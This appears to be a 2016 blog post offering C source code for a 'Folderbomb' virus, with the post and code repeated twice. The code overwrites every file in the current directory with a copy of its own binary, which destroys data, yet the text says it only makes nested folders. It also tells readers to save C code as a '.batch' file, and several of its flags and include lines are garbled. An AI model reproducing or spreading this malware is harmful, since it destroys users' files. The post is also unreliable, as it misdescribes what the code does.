This is a simple program to create a virus
It will create Folder in a Folder in a Folder and so on ......
Open notepad any Paste This Code And save this as Techfundaz.batch
✖✖✖✖✖✖✖✖✖✖✖✖
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”—————————————————————?———–”);
printf(”nVirus: Folderbomb 1.0nProgrammer:BAS Unnikrishnan(asystem0@gmail.co?m)n”);
cprintf(”—————————————————————?———–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_?BINARY);
target=open(ffblk.ff_name,O_CR?EATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
✴✴✴✴✴✴✴✴✴✴✴✴Dont try in your PC... :D
✴✴✴✴✴✴✴✴✴✴✴✴
Try at your own Risk .we don't Responsible for it
It will create Folder in a Folder in a Folder and so on ......
Open notepad any Paste This Code And save this as Techfundaz.batch
✖✖✖✖✖✖✖✖✖✖✖✖
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”—————————————————————?———–”);
printf(”nVirus: Folderbomb 1.0nProgrammer:BAS Unnikrishnan(asystem0@gmail.co?m)n”);
cprintf(”—————————————————————?———–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_?BINARY);
target=open(ffblk.ff_name,O_CR?EATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
✴✴✴✴✴✴✴✴✴✴✴✴Dont try in your PC... :D
✴✴✴✴✴✴✴✴✴✴✴✴
Try at your own Risk .we don't Responsible for it
How to make Folder in Folder Virus
Reviewed by Unknown
on
March 20, 2016
Rating:
No comments: